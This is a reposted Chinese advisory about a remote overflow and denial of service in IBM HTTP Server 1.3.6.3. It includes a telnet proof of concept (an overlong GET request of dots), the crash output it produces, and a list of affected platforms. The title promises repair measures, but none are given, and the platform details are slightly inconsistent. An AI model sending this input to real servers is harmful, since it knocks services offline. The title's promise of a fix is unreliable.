加入收藏 | 设为首页 | 会员中心 | 我要投稿 聊城站长网 (https://www.0635zz.com/)- 智能语音交互、行业智能、AI应用、云计算、5G!
当前位置: 首页 > 教程 > 正文

IBM HTTP Server漏洞修补措施

发布时间:2023-07-05 14:38:49 所属栏目:教程 来源:
导读:给大家分享一篇IBM HTTP Server漏洞修复措施,感兴趣的朋友跟小编一起来了解一下吧!

  涉及程序:

  GET

  描述:

  通过提交超长的GET请求导致IBM HTTP Server远程溢出

  详细:
给大家分享一篇IBM HTTP Server漏洞修复措施,感兴趣的朋友跟小编一起来了解一下吧!
 
  涉及程序:
 
  GET
 
  描述:
 
  通过提交超长的GET请求导致IBM HTTP Server远程溢出
 
  详细:
 
  IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。
 
  如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用该漏洞,攻击者可在受害的主机上执行任何代码。(但这还未得到完全证实。)
 
  以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
 
  $ telnet target 80
 
  GET /......(216个".")aaa HTTP/1.0
 
  则系统会报告下列错误信息:
 
  ***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
 
  ON_NOT_HANDLED.
 
  ***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
 
  注意:目标主机运行在Windows 2000下。
 
  受影响的系统
 
  IBM HTTP Server 1.3.6.3
 
  - TurboLinux Turbo Linux 3.0.1
 
  - Sun Solaris 2.6
 
  - S.u.S.E. Linux 6.1
 
  - S.u.S.E. Linux 6.0
 
  - RedHat Linux 6.0 sparc
 
  - RedHat Linux 5.2 sparc
 
  - Microsoft Windows NT 4.0
 
  - IBM AIX 4.2.1
 
  - Caldera OpenLinux 2.2
 
 

(编辑:聊城站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!